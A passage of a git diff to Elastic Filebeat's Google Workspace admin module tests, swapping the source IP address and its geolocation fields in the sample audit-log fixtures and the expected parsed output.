 "source.user.id": "1",
@@ -189,7 +177,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -207,26 +195,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1853,
+ "log.offset": 1850,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -248,7 +232,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -261,26 +245,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2346,
+ "log.offset": 2342,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -301,7 +281,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -314,26 +294,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2770,
+ "log.offset": 2765,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -354,7 +330,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -367,26 +343,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3218,
+ "log.offset": 3212,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -408,7 +380,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -421,26 +393,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3666,
+ "log.offset": 3659,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -462,7 +430,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -474,26 +442,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4114,
+ "log.offset": 4106,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log
index bcbed9ee8866..6a2cc3c30726 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log
@@ -1,13 +1,13 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json
index be2cca866609..9d5d112ce76d 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json
